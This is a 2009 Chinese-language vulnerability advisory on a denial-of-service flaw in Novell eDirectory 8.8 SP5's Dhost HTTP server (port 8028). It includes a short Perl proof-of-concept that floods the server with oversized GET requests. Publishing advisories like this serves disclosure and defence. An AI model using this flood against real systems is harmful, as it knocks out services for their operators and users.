发布日期：2009-09-08
更新日期：2009-09-09

受影响系统：

Novell eDirectory 8.8 SP5

描述：

---

BUGTRAQ  ID: 36301

Novell eDirectory是一个的跨平台的目录服务器。

如果远程攻击者向eDirectory服务器的8028端口（Dhost Http Server的默认端口）提交了包含有大量Unicode字符串的特制HTTP请求，就会导致耗尽100%的CPU资源。

<*来源：Hellcode Research
  
  链接：http://marc.info/?l=bugtraq&m=125242788408261&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

- snip-
....

$data = "?" x 500000;

for($i= 0; $i < 1000; $i++)
{
    $sock= new IO::Socket::INET( PeerAddr => "localhost",
    PeerPort => 8028,

    Proto => 'tcp',
    Type => SOCK_STREAM,

    );
    
    print $sock "GET /$data HTTP/1.0\r\n\r\n";
    
    close($sock);
}

...
    - snip -

建议：

---

厂商补丁：

Novell
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://support.novell.com/security-alerts

浏览次数：2292
严重程度：0（网友投票）